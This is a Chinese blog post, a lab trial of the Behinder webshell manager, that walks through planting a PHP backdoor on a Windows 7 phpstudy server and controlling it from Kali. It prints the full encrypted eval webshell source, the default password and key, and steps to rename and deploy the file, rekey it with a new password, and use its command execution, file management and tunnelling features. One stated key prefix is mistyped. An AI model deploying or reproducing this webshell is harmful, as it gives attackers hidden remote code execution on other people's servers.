PJzhang:冰蝎webshell管理工具试用

zoukankan html css js c++ java

PJzhang:冰蝎webshell管理工具试用
猫宁~~~

操作系统kali linux

https://github.com/rebeyond/Behinder
https://github.com/rebeyond/Behinder/releases
https://github.com/rebeyond/Behinder/releases/download/Behinder_v3.0_Beta_6/Behinder_v3.0_Beta_6_linux.zip

打开冰蝎客户端
java -jar /root/Desktop/Behinder_v3.0_Beta_6_linux/Behinder_v3.0_Beta6_linux.jar

kali linux系统IP 10.108.18.98

windows 7系统IP 10.108.18.99

windows 7采用phpstudy启用wamp

使用server文件夹中的shell.php
<?php @error_reporting(0); session_start(); $key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond $_SESSION['k']=$key; $post=file_get_contents("php://input"); if(!extension_loaded('openssl')) { $t="base64_"."decode"; $post=$t($post.""); for($i=0;$i<strlen($post);$i++) { $post[$i] = $post[$i]^$key[$i+1&15]; } } else { $post=openssl_decrypt($post, "AES128", $key); } $arr=explode('|',$post); $func=$arr[0]; $params=$arr[1]; class C{public function __invoke($p) {eval($p."");}} @call_user_func(new C(),$params); ?>
shell.php在C:phpstudy_proWWW下重命名为xiaozhupeiqi.php

http://10.108.18.99/xiaozhupeiqi.php

点击空白，右键新增，输入URL和默认密码rebeyond

连接成功

基本信息是一个phpinfo，还有命令执行，虚拟终端，文件管理，其中内网穿透功能可以试试。

rebeyond进行md5加密为e45e329feb5d925ba3f549b17b4b3dde

前16位是45e329feb5d925b

如果想要修改密码，只需要将自定义密码md5加密之后的前16位替换一下就OK

例如xiaozhupeiqi，md5加密，620157faf8ab159f0bc80ad0a8f42b68，前16位620157faf8ab159f

可以连接成功

md5加解密可以用这个网站

https://www.cmd5.com/hash.aspx

代理设置127.0.0.1 8081 http，burpsuite proxy的options对应设置，可以通过测试抓取流量

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36

除了支持php木马，还支持asp，aspx，jsp木马。

over~~~
https://space.bilibili.com/213872706
查看全文

相关阅读:
滴水穿石mysql添加授权用户命令
 滴水穿石修改IIS服务器的MIME类型
 滴水穿石Java静态代理
 滴水穿石MyEclipse中集成开发插件Spket
滴水穿石Java连接Access数据库及其操作
 好站收藏
 apache缓存设置
 Linux Apache开启gzip压缩提高网页下载速度
 web制作、开发人员需知的Web缓存知识
 cookiec和session学习笔记

原文地址：https://www.cnblogs.com/landesk/p/14282534.html